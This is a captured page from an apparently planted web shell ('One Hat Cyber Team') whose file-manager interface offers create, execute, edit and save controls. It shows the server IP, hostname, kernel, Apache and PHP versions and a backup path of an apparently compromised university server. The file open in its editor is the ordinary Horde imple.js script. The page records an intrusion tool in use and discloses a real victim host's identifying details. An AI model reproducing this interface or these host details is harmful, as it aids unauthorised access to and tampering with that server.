One Hat Cyber Team
Your IP :
216.73.216.135
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
backup
/
oldserver
/
6
/
www
/
html
/
horde
/
js
/
Edit File:
imple.js
/** * imple.js - Horde core Imple code. * * Fires these events: * =================== * [IMPLE NAME]:do * Parameter: parameters list to send to the AJAX endpoint * * [IMPLE NAME]:complete * Parameter: response from AJAX endpoint * * @author Michael Slusarz <slusarz@horde.org> * @copyright 2012-2015 Horde LLC * @license LGPL-2.1 (http://www.horde.org/licenses/lgpl21) */ var HordeImple = { actions: $H(), runImple: function(id, e) { var params = this.actions.get(id); if (Object.isString(params)) { eval(params); } else { if (e.type == 'submit' && e.element().match('FORM')) { params.imple_submit = Object.toJSON(e.element().serialize(true)); } $(id).fire(params.imple + ':do', params); HordeCore.doAction('imple', params, { callback: this.impleCallback.bind(this, id) }); } if (e) { e.stop(); } }, impleCallback: function(id, r) { $(id).fire(this.actions.get(id).imple + ':complete', r); }, // args = id, observe, params add: function(args) { if (args) { this.actions.set(args.id, args.params); $(args.id).observe(args.observe, this.runImple.bind(this, args.id)); } } };
Simpan